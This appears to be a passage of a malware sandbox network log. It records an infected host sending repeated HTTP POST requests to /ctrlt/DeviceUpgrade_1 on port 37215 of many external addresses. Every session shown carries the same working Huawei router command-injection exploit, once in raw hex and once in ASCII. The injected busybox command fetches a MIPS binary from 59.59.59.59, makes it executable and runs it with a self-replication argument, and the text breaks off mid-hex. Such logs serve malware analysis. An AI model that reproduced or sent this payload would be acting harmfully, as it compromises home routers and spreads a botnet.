                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1060192.168.2.154792849.249.1.2537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.717156887 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1061192.168.2.154762241.49.96.9137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.717176914 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1062192.168.2.153756441.111.211.2637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.717196941 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1063192.168.2.1539720197.92.196.19137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.717330933 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1064192.168.2.1550730203.224.215.9137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.717359066 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1065192.168.2.155757075.123.67.20137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.717389107 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1066192.168.2.154928641.70.30.22037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.717407942 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1067192.168.2.1547318157.124.215.19237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.717542887 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1068192.168.2.1554040157.221.151.15037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.717562914 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1069192.168.2.153306241.180.172.3737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.717750072 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 